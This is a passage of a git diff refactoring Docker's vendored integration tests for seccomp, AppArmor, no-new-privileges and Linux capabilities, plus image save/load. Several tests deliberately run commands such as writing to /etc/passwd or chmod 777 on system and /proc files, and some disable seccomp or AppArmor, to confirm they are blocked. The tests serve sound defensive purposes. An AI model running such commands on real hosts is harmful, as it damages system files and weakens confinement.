-		c.Fatalf("expected chmod with seccomp profile denied to fail, got %s", out)
-	}
+	icmd.RunCommand(dockerBinary, "run", "--security-opt", "seccomp="+tmpFile.Name(),
+		"busybox", "chmod", "400", "/etc/hostname").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Operation not permitted",
+	})
 }
 
 // TestRunSeccompProfileDenyUnshareUserns checks that 'docker run debian:jessie unshare --map-root-user --user sh -c whoami' with a specific profile to
-// deny unhare of a userns exits with operation not permitted.
+// deny unshare of a userns exits with operation not permitted.
 func (s *DockerSuite) TestRunSeccompProfileDenyUnshareUserns(c *check.C) {
 	testRequires(c, SameHostDaemon, seccompEnabled, NotArm, Apparmor)
 	// from sched.h
@@ -1008,11 +1012,12 @@ func (s *DockerSuite) TestRunSeccompProfileDenyUnshareUserns(c *check.C) {
 	if _, err := tmpFile.Write([]byte(jsonData)); err != nil {
 		c.Fatal(err)
 	}
-	runCmd := exec.Command(dockerBinary, "run", "--security-opt", "apparmor=unconfined", "--security-opt", "seccomp="+tmpFile.Name(), "debian:jessie", "unshare", "--map-root-user", "--user", "sh", "-c", "whoami")
-	out, _, _ := runCommandWithOutput(runCmd)
-	if !strings.Contains(out, "Operation not permitted") {
-		c.Fatalf("expected unshare userns with seccomp profile denied to fail, got %s", out)
-	}
+	icmd.RunCommand(dockerBinary, "run",
+		"--security-opt", "apparmor=unconfined", "--security-opt", "seccomp="+tmpFile.Name(),
+		"debian:jessie", "unshare", "--map-root-user", "--user", "sh", "-c", "whoami").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Operation not permitted",
+	})
 }
 
 // TestRunSeccompProfileDenyCloneUserns checks that 'docker run syscall-test'
@@ -1021,11 +1026,10 @@ func (s *DockerSuite) TestRunSeccompProfileDenyCloneUserns(c *check.C) {
 	testRequires(c, SameHostDaemon, seccompEnabled)
 	ensureSyscallTest(c)
 
-	runCmd := exec.Command(dockerBinary, "run", "syscall-test", "userns-test", "id")
-	out, _, err := runCommandWithOutput(runCmd)
-	if err == nil || !strings.Contains(out, "clone failed: Operation not permitted") {
-		c.Fatalf("expected clone userns with default seccomp profile denied to fail, got %s: %v", out, err)
-	}
+	icmd.RunCommand(dockerBinary, "run", "syscall-test", "userns-test", "id").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "clone failed: Operation not permitted",
+	})
 }
 
 // TestRunSeccompUnconfinedCloneUserns checks that
@@ -1035,10 +1039,10 @@ func (s *DockerSuite) TestRunSeccompUnconfinedCloneUserns(c *check.C) {
 	ensureSyscallTest(c)
 
 	// make sure running w privileged is ok
-	runCmd := exec.Command(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "syscall-test", "userns-test", "id")
-	if out, _, err := runCommandWithOutput(runCmd); err != nil || !strings.Contains(out, "nobody") {
-		c.Fatalf("expected clone userns with --security-opt seccomp=unconfined to succeed, got %s: %v", out, err)
-	}
+	icmd.RunCommand(dockerBinary, "run", "--security-opt", "seccomp=unconfined",
+		"syscall-test", "userns-test", "id").Assert(c, icmd.Expected{
+		Out: "nobody",
+	})
 }
 
 // TestRunSeccompAllowPrivCloneUserns checks that 'docker run --privileged syscall-test'
@@ -1048,10 +1052,9 @@ func (s *DockerSuite) TestRunSeccompAllowPrivCloneUserns(c *check.C) {
 	ensureSyscallTest(c)
 
 	// make sure running w privileged is ok
-	runCmd := exec.Command(dockerBinary, "run", "--privileged", "syscall-test", "userns-test", "id")
-	if out, _, err := runCommandWithOutput(runCmd); err != nil || !strings.Contains(out, "nobody") {
-		c.Fatalf("expected clone userns with --privileged to succeed, got %s: %v", out, err)
-	}
+	icmd.RunCommand(dockerBinary, "run", "--privileged", "syscall-test", "userns-test", "id").Assert(c, icmd.Expected{
+		Out: "nobody",
+	})
 }
 
 // TestRunSeccompProfileAllow32Bit checks that 32 bit code can run on x86_64
@@ -1060,10 +1063,7 @@ func (s *DockerSuite) TestRunSeccompProfileAllow32Bit(c *check.C) {
 	testRequires(c, SameHostDaemon, seccompEnabled, IsAmd64)
 	ensureSyscallTest(c)
 
-	runCmd := exec.Command(dockerBinary, "run", "syscall-test", "exit32-test", "id")
-	if out, _, err := runCommandWithOutput(runCmd); err != nil {
-		c.Fatalf("expected to be able to run 32 bit code, got %s: %v", out, err)
-	}
+	icmd.RunCommand(dockerBinary, "run", "syscall-test", "exit32-test").Assert(c, icmd.Success)
 }
 
 // TestRunSeccompAllowSetrlimit checks that 'docker run debian:jessie ulimit -v 1048510' succeeds.
@@ -1071,10 +1071,7 @@ func (s *DockerSuite) TestRunSeccompAllowSetrlimit(c *check.C) {
 	testRequires(c, SameHostDaemon, seccompEnabled)
 
 	// ulimit uses setrlimit, so we want to make sure we don't break it
-	runCmd := exec.Command(dockerBinary, "run", "debian:jessie", "bash", "-c", "ulimit -v 1048510")
-	if out, _, err := runCommandWithOutput(runCmd); err != nil {
-		c.Fatalf("expected ulimit with seccomp to succeed, got %s: %v", out, err)
-	}
+	icmd.RunCommand(dockerBinary, "run", "debian:jessie", "bash", "-c", "ulimit -v 1048510").Assert(c, icmd.Success)
 }
 
 func (s *DockerSuite) TestRunSeccompDefaultProfileAcct(c *check.C) {
@@ -1142,193 +1139,188 @@ func (s *DockerSuite) TestRunSeccompDefaultProfileNS(c *check.C) {
 	}
 }
 
-// TestRunNoNewPrivSetuid checks that --security-opt=no-new-privileges prevents
+// TestRunNoNewPrivSetuid checks that --security-opt='no-new-privileges=true' prevents
 // effective uid transtions on executing setuid binaries.
 func (s *DockerSuite) TestRunNoNewPrivSetuid(c *check.C) {
 	testRequires(c, DaemonIsLinux, NotUserNamespace, SameHostDaemon)
 	ensureNNPTest(c)
 
 	// test that running a setuid binary results in no effective uid transition
-	runCmd := exec.Command(dockerBinary, "run", "--security-opt", "no-new-privileges", "--user", "1000", "nnp-test", "/usr/bin/nnp-test")
-	if out, _, err := runCommandWithOutput(runCmd); err != nil || !strings.Contains(out, "EUID=1000") {
-		c.Fatalf("expected output to contain EUID=1000, got %s: %v", out, err)
-	}
+	icmd.RunCommand(dockerBinary, "run", "--security-opt", "no-new-privileges=true", "--user", "1000",
+		"nnp-test", "/usr/bin/nnp-test").Assert(c, icmd.Expected{
+		Out: "EUID=1000",
+	})
+}
+
+// TestLegacyRunNoNewPrivSetuid checks that --security-opt=no-new-privileges prevents
+// effective uid transtions on executing setuid binaries.
+func (s *DockerSuite) TestLegacyRunNoNewPrivSetuid(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace, SameHostDaemon)
+	ensureNNPTest(c)
+
+	// test that running a setuid binary results in no effective uid transition
+	icmd.RunCommand(dockerBinary, "run", "--security-opt", "no-new-privileges", "--user", "1000",
+		"nnp-test", "/usr/bin/nnp-test").Assert(c, icmd.Expected{
+		Out: "EUID=1000",
+	})
 }
 
 func (s *DockerSuite) TestUserNoEffectiveCapabilitiesChown(c *check.C) {
-	testRequires(c, DaemonIsLinux)
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
 	ensureSyscallTest(c)
 
 	// test that a root user has default capability CAP_CHOWN
-	runCmd := exec.Command(dockerBinary, "run", "busybox", "chown", "100", "/tmp")
-	_, _, err := runCommandWithOutput(runCmd)
-	c.Assert(err, check.IsNil)
+	dockerCmd(c, "run", "busybox", "chown", "100", "/tmp")
 	// test that non root user does not have default capability CAP_CHOWN
-	runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "chown", "100", "/tmp")
-	out, _, err := runCommandWithOutput(runCmd)
-	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Operation not permitted")
+	icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "busybox", "chown", "100", "/tmp").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Operation not permitted",
+	})
 	// test that root user can drop default capability CAP_CHOWN
-	runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "chown", "busybox", "chown", "100", "/tmp")
-	out, _, err = runCommandWithOutput(runCmd)
-	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Operation not permitted")
+	icmd.RunCommand(dockerBinary, "run", "--cap-drop", "chown", "busybox", "chown", "100", "/tmp").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Operation not permitted",
+	})
 }
 
 func (s *DockerSuite) TestUserNoEffectiveCapabilitiesDacOverride(c *check.C) {
-	testRequires(c, DaemonIsLinux)
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
 	ensureSyscallTest(c)
 
 	// test that a root user has default capability CAP_DAC_OVERRIDE
-	runCmd := exec.Command(dockerBinary, "run", "busybox", "sh", "-c", "echo test > /etc/passwd")
-	_, _, err := runCommandWithOutput(runCmd)
-	c.Assert(err, check.IsNil)
+	dockerCmd(c, "run", "busybox", "sh", "-c", "echo test > /etc/passwd")
 	// test that non root user does not have default capability CAP_DAC_OVERRIDE
-	runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "sh", "-c", "echo test > /etc/passwd")
-	out, _, err := runCommandWithOutput(runCmd)
-	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Permission denied")
-	// TODO test that root user can drop default capability CAP_DAC_OVERRIDE
+	icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "busybox", "sh", "-c", "echo test > /etc/passwd").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Permission denied",
+	})
 }
 
 func (s *DockerSuite) TestUserNoEffectiveCapabilitiesFowner(c *check.C) {
-	testRequires(c, DaemonIsLinux)
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
 	ensureSyscallTest(c)
 
 	// test that a root user has default capability CAP_FOWNER
-	runCmd := exec.Command(dockerBinary, "run", "busybox", "chmod", "777", "/etc/passwd")
-	_, _, err := runCommandWithOutput(runCmd)
-	c.Assert(err, check.IsNil)
+	dockerCmd(c, "run", "busybox", "chmod", "777", "/etc/passwd")
 	// test that non root user does not have default capability CAP_FOWNER
-	runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "chmod", "777", "/etc/passwd")
-	out, _, err := runCommandWithOutput(runCmd)
-	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Operation not permitted")
+	icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "busybox", "chmod", "777", "/etc/passwd").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Operation not permitted",
+	})
 	// TODO test that root user can drop default capability CAP_FOWNER
 }
 
 // TODO CAP_KILL
 
 func (s *DockerSuite) TestUserNoEffectiveCapabilitiesSetuid(c *check.C) {
-	testRequires(c, DaemonIsLinux)
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
 	ensureSyscallTest(c)
 
 	// test that a root user has default capability CAP_SETUID
-	runCmd := exec.Command(dockerBinary, "run", "syscall-test", "setuid-test")
-	_, _, err := runCommandWithOutput(runCmd)
-	c.Assert(err, check.IsNil)
+	dockerCmd(c, "run", "syscall-test", "setuid-test")
 	// test that non root user does not have default capability CAP_SETUID
-	runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "setuid-test")
-	out, _, err := runCommandWithOutput(runCmd)
-	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Operation not permitted")
+	icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "setuid-test").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Operation not permitted",
+	})
 	// test that root user can drop default capability CAP_SETUID
-	runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "setuid", "syscall-test", "setuid-test")
-	out, _, err = runCommandWithOutput(runCmd)
-	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Operation not permitted")
+	icmd.RunCommand(dockerBinary, "run", "--cap-drop", "setuid", "syscall-test", "setuid-test").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Operation not permitted",
+	})
 }
 
 func (s *DockerSuite) TestUserNoEffectiveCapabilitiesSetgid(c *check.C) {
-	testRequires(c, DaemonIsLinux)
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
 	ensureSyscallTest(c)
 
 	// test that a root user has default capability CAP_SETGID
-	runCmd := exec.Command(dockerBinary, "run", "syscall-test", "setgid-test")
-	_, _, err := runCommandWithOutput(runCmd)
-	c.Assert(err, check.IsNil)
+	dockerCmd(c, "run", "syscall-test", "setgid-test")
 	// test that non root user does not have default capability CAP_SETGID
-	runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "setgid-test")
-	out, _, err := runCommandWithOutput(runCmd)
-	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Operation not permitted")
+	icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "setgid-test").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Operation not permitted",
+	})
 	// test that root user can drop default capability CAP_SETGID
-	runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "setgid", "syscall-test", "setgid-test")
-	out, _, err = runCommandWithOutput(runCmd)
-	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Operation not permitted")
+	icmd.RunCommand(dockerBinary, "run", "--cap-drop", "setgid", "syscall-test", "setgid-test").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Operation not permitted",
+	})
 }
 
 // TODO CAP_SETPCAP
 
 func (s *DockerSuite) TestUserNoEffectiveCapabilitiesNetBindService(c *check.C) {
-	testRequires(c, DaemonIsLinux)
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
 	ensureSyscallTest(c)
 
 	// test that a root user has default capability CAP_NET_BIND_SERVICE
-	runCmd := exec.Command(dockerBinary, "run", "syscall-test", "socket-test")
-	_, _, err := runCommandWithOutput(runCmd)
-	c.Assert(err, check.IsNil)
+	dockerCmd(c, "run", "syscall-test", "socket-test")
 	// test that non root user does not have default capability CAP_NET_BIND_SERVICE
-	runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "socket-test")
-	out, _, err := runCommandWithOutput(runCmd)
-	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Permission denied")
+	icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "socket-test").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Permission denied",
+	})
 	// test that root user can drop default capability CAP_NET_BIND_SERVICE
-	runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "net_bind_service", "syscall-test", "socket-test")
-	out, _, err = runCommandWithOutput(runCmd)
-	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Permission denied")
+	icmd.RunCommand(dockerBinary, "run", "--cap-drop", "net_bind_service", "syscall-test", "socket-test").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Permission denied",
+	})
 }
 
 func (s *DockerSuite) TestUserNoEffectiveCapabilitiesNetRaw(c *check.C) {
-	testRequires(c, DaemonIsLinux)
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
 	ensureSyscallTest(c)
 
 	// test that a root user has default capability CAP_NET_RAW
-	runCmd := exec.Command(dockerBinary, "run", "syscall-test", "raw-test")
-	_, _, err := runCommandWithOutput(runCmd)
-	c.Assert(err, check.IsNil)
+	dockerCmd(c, "run", "syscall-test", "raw-test")
 	// test that non root user does not have default capability CAP_NET_RAW
-	runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "raw-test")
-	out, _, err := runCommandWithOutput(runCmd)
-	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Operation not permitted")
+	icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "raw-test").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Operation not permitted",
+	})
 	// test that root user can drop default capability CAP_NET_RAW
-	runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "net_raw", "syscall-test", "raw-test")
-	out, _, err = runCommandWithOutput(runCmd)
-	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Operation not permitted")
+	icmd.RunCommand(dockerBinary, "run", "--cap-drop", "net_raw", "syscall-test", "raw-test").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Operation not permitted",
+	})
 }
 
 func (s *DockerSuite) TestUserNoEffectiveCapabilitiesChroot(c *check.C) {
-	testRequires(c, DaemonIsLinux)
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
 	ensureSyscallTest(c)
 
 	// test that a root user has default capability CAP_SYS_CHROOT
-	runCmd := exec.Command(dockerBinary, "run", "busybox", "chroot", "/", "/bin/true")
-	_, _, err := runCommandWithOutput(runCmd)
-	c.Assert(err, check.IsNil)
+	dockerCmd(c, "run", "busybox", "chroot", "/", "/bin/true")
 	// test that non root user does not have default capability CAP_SYS_CHROOT
-	runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "chroot", "/", "/bin/true")
-	out, _, err := runCommandWithOutput(runCmd)
-	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Operation not permitted")
+	icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "busybox", "chroot", "/", "/bin/true").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Operation not permitted",
+	})
 	// test that root user can drop default capability CAP_SYS_CHROOT
-	runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "sys_chroot", "busybox", "chroot", "/", "/bin/true")
-	out, _, err = runCommandWithOutput(runCmd)
-	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Operation not permitted")
+	icmd.RunCommand(dockerBinary, "run", "--cap-drop", "sys_chroot", "busybox", "chroot", "/", "/bin/true").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Operation not permitted",
+	})
 }
 
 func (s *DockerSuite) TestUserNoEffectiveCapabilitiesMknod(c *check.C) {
-	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	testRequires(c, DaemonIsLinux, NotUserNamespace, SameHostDaemon)
 	ensureSyscallTest(c)
 
 	// test that a root user has default capability CAP_MKNOD
-	runCmd := exec.Command(dockerBinary, "run", "busybox", "mknod", "/tmp/node", "b", "1", "2")
-	_, _, err := runCommandWithOutput(runCmd)
-	c.Assert(err, check.IsNil)
+	dockerCmd(c, "run", "busybox", "mknod", "/tmp/node", "b", "1", "2")
 	// test that non root user does not have default capability CAP_MKNOD
-	runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "mknod", "/tmp/node", "b", "1", "2")
-	out, _, err := runCommandWithOutput(runCmd)
-	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Operation not permitted")
+	// test that root user can drop default capability CAP_SYS_CHROOT
+	icmd.RunCommand(dockerBinary, "run", "--user", "1000:1000", "busybox", "mknod", "/tmp/node", "b", "1", "2").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Operation not permitted",
+	})
 	// test that root user can drop default capability CAP_MKNOD
-	runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "mknod", "busybox", "mknod", "/tmp/node", "b", "1", "2")
-	out, _, err = runCommandWithOutput(runCmd)
-	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Operation not permitted")
+	icmd.RunCommand(dockerBinary, "run", "--cap-drop", "mknod", "busybox", "mknod", "/tmp/node", "b", "1", "2").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Operation not permitted",
+	})
 }
 
 // TODO CAP_AUDIT_WRITE
@@ -1338,14 +1330,16 @@ func (s *DockerSuite) TestRunApparmorProcDirectory(c *check.C) {
 	testRequires(c, SameHostDaemon, Apparmor)
 
 	// running w seccomp unconfined tests the apparmor profile
-	runCmd := exec.Command(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "busybox", "chmod", "777", "/proc/1/cgroup")
-	if out, _, err := runCommandWithOutput(runCmd); err == nil || !(strings.Contains(out, "Permission denied") || strings.Contains(out, "Operation not permitted")) {
-		c.Fatalf("expected chmod 777 /proc/1/cgroup to fail, got %s: %v", out, err)
+	result := icmd.RunCommand(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "busybox", "chmod", "777", "/proc/1/cgroup")
+	result.Assert(c, icmd.Expected{ExitCode: 1})
+	if !(strings.Contains(result.Combined(), "Permission denied") || strings.Contains(result.Combined(), "Operation not permitted")) {
+		c.Fatalf("expected chmod 777 /proc/1/cgroup to fail, got %s: %v", result.Combined(), result.Error)
 	}
 
-	runCmd = exec.Command(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "busybox", "chmod", "777", "/proc/1/attr/current")
-	if out, _, err := runCommandWithOutput(runCmd); err == nil || !(strings.Contains(out, "Permission denied") || strings.Contains(out, "Operation not permitted")) {
-		c.Fatalf("expected chmod 777 /proc/1/attr/current to fail, got %s: %v", out, err)
+	result = icmd.RunCommand(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "busybox", "chmod", "777", "/proc/1/attr/current")
+	result.Assert(c, icmd.Expected{ExitCode: 1})
+	if !(strings.Contains(result.Combined(), "Permission denied") || strings.Contains(result.Combined(), "Operation not permitted")) {
+		c.Fatalf("expected chmod 777 /proc/1/attr/current to fail, got %s: %v", result.Combined(), result.Error)
 	}
 }
 
@@ -1410,7 +1404,7 @@ func (s *DockerSuite) TestRunDeviceSymlink(c *check.C) {
 
 // TestRunPIDsLimit makes sure the pids cgroup is set with --pids-limit
 func (s *DockerSuite) TestRunPIDsLimit(c *check.C) {
-	testRequires(c, pidsLimit)
+	testRequires(c, SameHostDaemon, pidsLimit)
 
 	file := "/sys/fs/cgroup/pids/pids.max"
 	out, _ := dockerCmd(c, "run", "--name", "skittles", "--pids-limit", "4", "busybox", "cat", file)
@@ -1449,8 +1443,7 @@ func (s *DockerSuite) TestRunUserDeviceAllowed(c *check.C) {
 func (s *DockerDaemonSuite) TestRunSeccompJSONNewFormat(c *check.C) {
 	testRequires(c, SameHostDaemon, seccompEnabled)
 
-	err := s.d.StartWithBusybox()
-	c.Assert(err, check.IsNil)
+	s.d.StartWithBusybox(c)
 
 	jsonData := `{
 	"defaultAction": "SCMP_ACT_ALLOW",
@@ -1475,8 +1468,7 @@ func (s *DockerDaemonSuite) TestRunSeccompJSONNewFormat(c *check.C) {
 func (s *DockerDaemonSuite) TestRunSeccompJSONNoNameAndNames(c *check.C) {
 	testRequires(c, SameHostDaemon, seccompEnabled)
 
-	err := s.d.StartWithBusybox()
-	c.Assert(err, check.IsNil)
+	s.d.StartWithBusybox(c)
 
 	jsonData := `{
 	"defaultAction": "SCMP_ACT_ALLOW",
@@ -1502,8 +1494,7 @@ func (s *DockerDaemonSuite) TestRunSeccompJSONNoNameAndNames(c *check.C) {
 func (s *DockerDaemonSuite) TestRunSeccompJSONNoArchAndArchMap(c *check.C) {
 	testRequires(c, SameHostDaemon, seccompEnabled)
 
-	err := s.d.StartWithBusybox()
-	c.Assert(err, check.IsNil)
+	s.d.StartWithBusybox(c)
 
 	jsonData := `{
 	"archMap": [
@@ -1540,11 +1531,10 @@ func (s *DockerDaemonSuite) TestRunSeccompJSONNoArchAndArchMap(c *check.C) {
 func (s *DockerDaemonSuite) TestRunWithDaemonDefaultSeccompProfile(c *check.C) {
 	testRequires(c, SameHostDaemon, seccompEnabled)
 
-	err := s.d.StartWithBusybox()
-	c.Assert(err, check.IsNil)
+	s.d.StartWithBusybox(c)
 
 	// 1) verify I can run containers with the Docker default shipped profile which allows chmod
-	_, err = s.d.Cmd("run", "busybox", "chmod", "777", ".")
+	_, err := s.d.Cmd("run", "busybox", "chmod", "777", ".")
 	c.Assert(err, check.IsNil)
 
 	jsonData := `{
@@ -1563,8 +1553,7 @@ func (s *DockerDaemonSuite) TestRunWithDaemonDefaultSeccompProfile(c *check.C) {
 	c.Assert(err, check.IsNil)
 
 	// 2) restart the daemon and add a custom seccomp profile in which we deny chmod
-	err = s.d.Restart("--seccomp-profile=" + tmpFile.Name())
-	c.Assert(err, check.IsNil)
+	s.d.Restart(c, "--seccomp-profile="+tmpFile.Name())
 
 	out, err := s.d.Cmd("run", "busybox", "chmod", "777", ".")
 	c.Assert(err, check.NotNil)
@@ -1579,14 +1568,18 @@ func (s *DockerSuite) TestRunWithNanoCPUs(c *check.C) {
 	out, _ := dockerCmd(c, "run", "--cpus", "0.5", "--name", "test", "busybox", "sh", "-c", fmt.Sprintf("cat %s && cat %s", file1, file2))
 	c.Assert(strings.TrimSpace(out), checker.Equals, "50000\n100000")
 
-	out = inspectField(c, "test", "HostConfig.NanoCpus")
-	c.Assert(out, checker.Equals, "5e+08", check.Commentf("setting the Nano CPUs failed"))
+	clt, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	inspect, err := clt.ContainerInspect(context.Background(), "test")
+	c.Assert(err, checker.IsNil)
+	c.Assert(inspect.HostConfig.NanoCPUs, checker.Equals, int64(500000000))
+
 	out = inspectField(c, "test", "HostConfig.CpuQuota")
 	c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS quota should be 0"))
 	out = inspectField(c, "test", "HostConfig.CpuPeriod")
 	c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS period should be 0"))
 
-	out, _, err := dockerCmdWithError("run", "--cpus", "0.5", "--cpu-quota", "50000", "--cpu-period", "100000", "busybox", "sh")
+	out, _, err = dockerCmdWithError("run", "--cpus", "0.5", "--cpu-quota", "50000", "--cpu-period", "100000", "busybox", "sh")
 	c.Assert(err, check.NotNil)
 	c.Assert(out, checker.Contains, "Conflicting options: Nano CPUs and CPU Period cannot both be set")
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go
index 70139a59bc..688eac684e 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go
@@ -1,8 +1,10 @@
 package main
 
 import (
+	"archive/tar"
 	"encoding/json"
 	"fmt"
+	"io"
 	"io/ioutil"
 	"os"
 	"os/exec"
@@ -13,9 +15,11 @@ import (
 	"strings"
 	"time"
 
-	"github.com/docker/distribution/digest"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli/build"
 	"github.com/go-check/check"
+	"github.com/opencontainers/go-digest"
+	"gotest.tools/icmd"
 )
 
 // save a repo using gz compression and try to load it using stdout
@@ -29,17 +33,19 @@ func (s *DockerSuite) TestSaveXzAndLoadRepoStdout(c *check.C) {
 
 	dockerCmd(c, "inspect", repoName)
 
-	repoTarball, _, err := runCommandPipelineWithOutput(
+	repoTarball, err := RunCommandPipelineWithOutput(
 		exec.Command(dockerBinary, "save", repoName),
 		exec.Command("xz", "-c"),
 		exec.Command("gzip", "-c"))
 	c.Assert(err, checker.IsNil, check.Commentf("failed to save repo: %v %v", out, err))
 	deleteImages(repoName)
 
-	loadCmd := exec.Command(dockerBinary, "load")
-	loadCmd.Stdin = strings.NewReader(repoTarball)
-	out, _, err = runCommandWithOutput(loadCmd)
-	c.Assert(err, checker.NotNil, check.Commentf("expected error, but succeeded with no error and output: %v", out))
+	icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "load"},
+		Stdin:   strings.NewReader(repoTarball),
+	}).Assert(c, icmd.Expected{
+		ExitCode: 1,
+	})
 
 	after, _, err := dockerCmdWithError("inspect", repoName)
 	c.Assert(err, checker.NotNil, check.Commentf("the repo should not exist: %v", after))
@@ -56,7 +62,7 @@ func (s *DockerSuite) TestSaveXzGzAndLoadRepoStdout(c *check.C) {
 
 	dockerCmd(c, "inspect", repoName)
 
-	out, _, err := runCommandPipelineWithOutput(
+	out, err := RunCommandPipelineWithOutput(
 		exec.Command(dockerBinary, "save", repoName),
 		exec.Command("xz", "-c"),
 		exec.Command("gzip", "-c"))
@@ -64,10 +70,12 @@ func (s *DockerSuite) TestSaveXzGzAndLoadRepoStdout(c *check.C) {
 
 	deleteImages(repoName)
 
-	loadCmd := exec.Command(dockerBinary, "load")
-	loadCmd.Stdin = strings.NewReader(out)
-	out, _, err = runCommandWithOutput(loadCmd)
-	c.Assert(err, checker.NotNil, check.Commentf("expected error, but succeeded with no error and output: %v", out))
+	icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "load"},
+		Stdin:   strings.NewReader(out),
+	}).Assert(c, icmd.Expected{
+		ExitCode: 1,
+	})
 
 	after, _, err := dockerCmdWithError("inspect", repoName)
 	c.Assert(err, checker.NotNil, check.Commentf("the repo should not exist: %v", after))
@@ -81,7 +89,7 @@ func (s *DockerSuite) TestSaveSingleTag(c *check.C) {
 	out, _ := dockerCmd(c, "images", "-q", "--no-trunc", repoName)
 	cleanedImageID := strings.TrimSpace(out)
 
-	out, _, err := runCommandPipelineWithOutput(
+	out, err := RunCommandPipelineWithOutput(
 		exec.Command(dockerBinary, "save", fmt.Sprintf("%v:latest", repoName)),
 		exec.Command("tar", "t"),
 		exec.Command("grep", "-E", fmt.Sprintf("(^repositories$|%v)", cleanedImageID)))
@@ -92,15 +100,15 @@ func (s *DockerSuite) TestSaveCheckTimes(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	repoName := "busybox:latest"
 	out, _ := dockerCmd(c, "inspect", repoName)
-	data := []struct {
+	var data []struct {
 		ID      string
 		Created time.Time
-	}{}
+	}
